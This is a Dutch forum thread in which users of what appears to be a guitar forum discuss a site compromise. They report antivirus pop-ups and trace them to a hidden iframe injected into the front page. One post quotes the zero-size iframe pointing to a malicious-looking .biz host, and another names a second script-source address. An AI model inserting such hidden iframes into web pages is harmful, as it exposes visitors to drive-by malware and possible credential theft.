Ik krijg allerlei vrusmeldingen wanneer ik dit betreed (paard van Troje) .

Opletten ?

Ik heb er sinds gisteren ook last van, pop-up-waarschuwingen bij het openen van de pagina over scripts die ik wel of niet wil laten uitvoeren, soms met een geheel zichtbaar adres van herkomst en soms met onduidelijke bron. Zonet kreeg ik dit adres: configurablefolderstry.blz:41991/code/library/ als bron van het script.

Yep,deze en alleen in Windows????

http://img.tapatalk.com/d/13/09/03/panedyne.jpg

Groet,
Marco

Ik krijg 'm ook. Heb ik Ido op de hoogte gesteld van dit probleem.

Windows Firefox. Een Java ding. Chrome heeft er geen last van.

Maar even op Chrome over schakelen dan want om nou voorlopig bij elke pagina die geopend wordt twee pop-ups weg te moeten klikken.. :stop:

idd een Java ding. Met Firefox geen probleem. Onder IE krijg ik die popup niet maar wel een laad-fout.

Adblocker bij Firefox ;) Ik heb er geen last van.

idd een Java ding. Met Firefox geen probleem. Onder IE krijg ik die popup niet maar wel een laad-fout.


Adblocker bij Firefox ;) Ik heb er geen last van.

Kijk eens goed naar de foto......

Firefox en Adblocker!

En op mijn appels totaal geen probleem!!!!!????

En op mijn appels totaal geen probleem!!!!!????

... of die accepteert standaard alle (brakke) Java-apps, dus zonder melding.

... of die accepteert standaard alle (brakke) Java-apps, dus zonder melding.

Uuuhhhh mis ik iets!!!

Groet,
Marco

Uuuhhhh mis ik iets!!!

Als je netjes een virusscanner op je Mac draait niet ...

Apple's securitybeleid loopt jaren achter op Microsoft, en dat wil heel wat zeggen ;)

Ah! De frontpage. Daar kom ik niet zo vaak. Daar zit het ding inderdaad in de source gehackt.

508

Volgens mij zijn anderen hier meer in thuis dan ik verder.

Volgens mij zijn anderen hier meer in thuis dan ik verder.

Als ze een iframe in de source code hebben weten te hacken, ga er dan maar vanuit dat ze er ook met de database vandoor zijn gegaan. (gebuikersnamen/emailadressen/wachtwoorden/etc)

Jep. Maar is dat zo. Ik krijg (als non-IT-er) eerder het gevoel dat dit is meegelift op een google add service.

Jep. Maar is dat zo. Ik krijg (als non-IT-er) eerder het gevoel dat dit is meegelift op een google add service.

Die kan niets injecteren in een bestand.

Als ik javascript uit zet vind ik nog steeds deze troep in de src: "<iframe src="http://regeditoutpace.biz:41991/gb/data/reklama/view.php?join=217" width="0" height="0"></iframe>".

Als je netjes een virusscanner op je Mac draait niet ...

Apple's securitybeleid loopt jaren achter op Microsoft, en dat wil heel wat zeggen ;)

Ahhh gelukkig !!!!! Mijn Mac's zijn ook beter beveiligd als mijn Windows laptop....

Groet,
Marco

Ahhh gelukkig !!!!! Mijn Mac's zijn ook beter beveiligd als mijn Windows laptop....

Ik zou bij beide OS'en geen onnodige risico's nemen ...

Denk dat het is verholpen, de pop-ups zijn weg bij mij in Ff.

Denk dat het is verholpen, de pop-ups zijn weg bij mij in Ff.

Iframe-code is idd weg. Maar hou er maar rekening mee dat je emailadres/wachtwoord/etc buitgemaakt is.

Ik zou bij beide OS'en geen onnodige risico's nemen ...

Thanx,loopt al...

Gaat hier allemaal via een server...dan is de server voldoende neem ik aan.

Groet,
Marco

Iframe-code is idd weg. Maar hou er maar rekening mee dat je emailadres/wachtwoord/etc buitgemaakt is.

Ook als ik geen toestemming heb gegeven om die shit te draaien, heb het elke keer geweigerd?

Ook als ik geen toestemming heb gegeven om die shit te draaien, heb het elke keer geweigerd?

Nee, omdat de boeven toegang tot de server hebben gehad.

Ido is er inmiddels in gedoken.

@Harold: toegang krijgen tot de site om de code aan te passen is nog wel anders dan toegang krijgen tot de database. Dat hoeft natuurlijk niet gebeurt te zijn.

@Harold: toegang krijgen tot de site om de code aan te passen is nog wel anders dan toegang krijgen tot de database. Dat hoeft natuurlijk niet gebeurt te zijn.

Geef mij 1 regel php-code en ik geef jou alle emailadressen + wachtwoorden. En ik ben maar een simpele php-ontwikkelaar, geen "professionele" hacker die misschien wel fulltime bezig is om vBulletin-fora te hacken.

Als Certified Ethical Hacker sluit ik me aan bij Harold; houd er maar vast rekening mee dat er in de database gegrabbeld is, en dat het handig is om mensen voor de zekerheid hun wachtwoorden te laten veranderen, zowel hier als op de email adressen verbonden aan gitaarnet accounts.